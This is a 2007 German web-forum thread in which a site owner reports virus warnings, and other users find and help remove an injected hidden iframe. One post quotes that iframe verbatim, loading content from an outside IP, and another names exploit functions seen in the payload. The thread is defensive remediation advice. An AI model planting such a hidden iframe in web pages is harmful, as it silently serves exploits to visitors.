Zurück   klamm-Forum > klamm-Lose > Lose4Scripts

Antwort
 
LinkBack Themen-Optionen Ansicht
Alt 15.08.2007, 16:17:01   #1 (permalink)
KSC 4ever

Reg: 05.02.2007
Beiträge: 1.155
Standard aktive x auf meiner seite

Hallo
seid 3 Tagen wenn ich auf meine Seite gehe kommt das ich ein Virus hätte ^^
es wurde nix installiert oder eingebaut
www.mailhood.de
wer kann mir sagen wie ich das beheben kann ?
bitte mit preis
danke
 
sinus2k7 ist offline   Mit Zitat antworten
Alt 15.08.2007, 16:23:51   #2 (permalink)
Erfahrener Benutzer
Benutzerbild von PeterLV

ID: 52879
Lose-Remote

PeterLV eine Nachricht über ICQ schicken
Reg: 24.04.2006
Beiträge: 2.815
Standard

es sollte sich aber,

in deinen temporaeren dateien etwas befinden :_)
muss es aber nicht.

ueberpruefe mal alle banner und links, die du vor drei tagen neu eingebaut hast.

gruss

peter
 
PeterLV ist offline   Mit Zitat antworten
Alt 15.08.2007, 16:26:52   #3 (permalink)
KSC 4ever

Reg: 05.02.2007
Beiträge: 1.155
Standard

habe keine Banner oder links rein gemacht,und die user bekommen es ja auch,und im Forum ebenso

könnte es auch an Userbannern handeln ?
oder die banner von den interfaces ?
 

Geändert von sinus2k7 (15.08.2007 um 16:28:29 Uhr)
sinus2k7 ist offline Threadstarter   Mit Zitat antworten
Alt 15.08.2007, 16:31:55   #4 (permalink)
Erfahrener Benutzer
Benutzerbild von MM-Webworkx

ID: 156974
Lose-Remote

Reg: 20.04.2006
Beiträge: 710
Standard

also mir ist vor ca 5 Tagen das schon aufgefallen, dass da irgentein HTML Virus in mein Cach wollte

Wenn ich den HTML Code davon mal überfliege stechen mir sofort Funktionen wie "firefox_exploit()", "vml_exploit()" "wmplayer_exploit()" "qtime_exploit()" "yahoo_exploit()" "winzip_exploit()" "mdac_exploit()" etc. ins Auge...

Edit: kann meinem "Nachposter" nur zustimmen^^

Änder lieber mal FTP Zugang usw. und kill den Iframe da raus
 

Geändert von MM-Webworkx (15.08.2007 um 16:34:19 Uhr)
MM-Webworkx ist offline   Mit Zitat antworten
Alt 15.08.2007, 16:31:58   #5 (permalink)
Erfahrener Benutzer

ID: 134425
Lose-Remote

Reg: 30.04.2006
Beiträge: 211
Standard

es scheint irgendjemand deine Seite gehackt zu haben!
Wenn man sich den Quelltext anschaut findet man ganz am schluss folgendes IFrame: <iframe src='http://81.95.144.76/fft/' width=0 height=0></iframe>
Hab in anderen Foren schonmal was darüber gelesen das da dieser "Virus" herkommen soll.
Loseschleuder.de - Jede Stunde mehrmals bis zu 100.000 Bonuslose geschenkt!
Keine extra Anmeldung nötig! Klamm ID genügt! Viele weitere Verdienstmöglichkeiten.
Auszahlung ab 1 Klammlos
schulz3000 ist offline   Mit Zitat antworten
Alt 15.08.2007, 16:35:06   #6 (permalink)
KSC 4ever

Reg: 05.02.2007
Beiträge: 1.155
Standard

ok danke für die info werede das pw ändern und den iframe rausnehmen weil ich habe keine drin
 
sinus2k7 ist offline Threadstarter   Mit Zitat antworten
Alt 15.08.2007, 16:48:15   #7 (permalink)
Erfahrener Benutzer
Benutzerbild von MM-Webworkx

ID: 156974
Lose-Remote

Reg: 20.04.2006
Beiträge: 710
Standard

hab jetzt (zumindest im Moment) keine Probleme mehr auf deiner Seite!
 
MM-Webworkx ist offline   Mit Zitat antworten
Alt 15.08.2007, 16:58:31   #8 (permalink)
KSC 4ever

Reg: 05.02.2007
Beiträge: 1.155
Standard

Zitat:
Zitat von MM-Webworkx Beitrag anzeigen
hab jetzt (zumindest im Moment) keine Probleme mehr auf deiner Seite!
danke,auf allen index seiten wie direkt,forum und admin index waren die iframes drin,habe nun alle rausgenommen alle passwörter geändert und mein hoster informiert

danke für eure hilfe

kann closed
 
sinus2k7 ist offline Threadstarter   Mit Zitat antworten
Alt 15.08.2007, 17:05:19   #9 (permalink)
Erfahrener Benutzer
Benutzerbild von MM-Webworkx

ID: 156974
Lose-Remote

Reg: 20.04.2006
Beiträge: 710
Standard

Zitat:
Zitat von sinus2k7 Beitrag anzeigen
danke,auf allen index seiten wie direkt,forum und admin index waren die iframes drin
das ist natürlich böse, der Iframe kam scheinbar von net russischen Seite

Zitat:
danke für eure hilfe
kein Ding
 
MM-Webworkx ist offline   Mit Zitat antworten
Alt 15.08.2007, 17:17:05   #10 (permalink)
Erfahrener Benutzer
Benutzerbild von PeterLV

ID: 52879
Lose-Remote

PeterLV eine Nachricht über ICQ schicken
Reg: 24.04.2006
Beiträge: 2.815
Standard

nun haeng ich mich mal dran,

http://lose-24.de/search1/index.htm und
http://lose-24.de/search1/index.html

habe ich nur beim explorer die warnung, im FF funzt das einwandfrei,

Heeeelp :-)

peter
 

Geändert von PeterLV (15.08.2007 um 17:18:17 Uhr)
PeterLV ist offline   Mit Zitat antworten
Alt 15.08.2007, 17:20:49   #11 (permalink)
Erfahrener Benutzer
Benutzerbild von MM-Webworkx

ID: 156974
Lose-Remote

Reg: 20.04.2006
Beiträge: 710
Standard

Zitat:
Zitat von PeterLV Beitrag anzeigen
nun haeng ich mich mal dran,

http://lose-24.de/search1/index.htm und
http://lose-24.de/search1/index.html

habe ich nur beim explorer die warnung, im FF funzt das einwandfrei,

Heeeelp :-)

peter
Verstehe grad net, meinst du, du bekommst auch ne Viren Meldung oder was?!
 
MM-Webworkx ist offline   Mit Zitat antworten
Alt 15.08.2007, 17:23:24   #12 (permalink)
Programmierer
Benutzerbild von IamTheDj

Reg: 04.10.2006
Beiträge: 1.744
Standard

Zitat:
Zitat von PeterLV Beitrag anzeigen
nun haeng ich mich mal dran,

http://lose-24.de/search1/index.htm und
http://lose-24.de/search1/index.html

habe ich nur beim explorer die warnung, im FF funzt das einwandfrei,

Heeeelp :-)

peter
Bit spring bei mir weder im IE noch im FF an.
| PrimusURL zahlt 0.2 Primera pro KurzURL Aufruf / View |
| LoseCounter zahlt 1000 Klammlose pro Besucher / View |
| SponsorCounter zahlt 0.009 Euro pro Besucher / View |



Geändert von IamTheDj (15.08.2007 um 17:23:44 Uhr)
IamTheDj ist offline   Mit Zitat antworten
Alt 15.08.2007, 17:36:37   #13 (permalink)
Erfahrener Benutzer
Benutzerbild von PeterLV

ID: 52879
Lose-Remote

PeterLV eine Nachricht über ICQ schicken
Reg: 24.04.2006
Beiträge: 2.815
Standard

tja,

dann scheint das wohl computerbedingt zu sein :-)


Korporal18,

ich habe auch nicht um contexbewertung gebeten :-)


thx. peter
 
PeterLV ist offline   Mit Zitat antworten
Alt 15.08.2007, 17:39:37   #14 (permalink)
KSC 4ever

Reg: 05.02.2007
Beiträge: 1.155
Standard

also ich bekomme ein Virus wenn ich da drauf gehe ^^
 
sinus2k7 ist offline Threadstarter   Mit Zitat antworten
Alt 15.08.2007, 18:11:03   #15 (permalink)
Powerhamster
Benutzerbild von burnred

ID: 34739
Lose-Remote

burnred eine Nachricht über ICQ schicken burnred eine Nachricht über MSN schicken burnred eine Nachricht über Skype™ schicken
Reg: 04.05.2006
Beiträge: 681
Standard

Das es im Firefox nicht kommt könnte u.A. an AdBlock liegen oder?
Sieht die Welt durch 3x WQHD @ 25" (DELL U2515H)
burnred ist offline   Mit Zitat antworten
Antwort

Gesponsorte Links

Anzeige


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind an
Pingbacks sind an
Refbacks sind an


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
erweiterung meiner Seite hubba Paid4 - News & Infos 0 19.06.2008 10:12:33
Ich zu eurer Seite | Ihr zu meiner Seite CoRnY08 Rallys, Refhandel, Reftausch & anderes 16 09.05.2008 13:47:04
Werbung auf meiner Seite der_beste Lose4Werbung 6 24.06.2006 14:21:35
Bannerplätze auf meiner Seite niro Lose4Werbung (erledigt) 10 10.06.2006 17:39:45


Alle Zeitangaben in WEZ +1. Es ist jetzt 16:27:31 Uhr.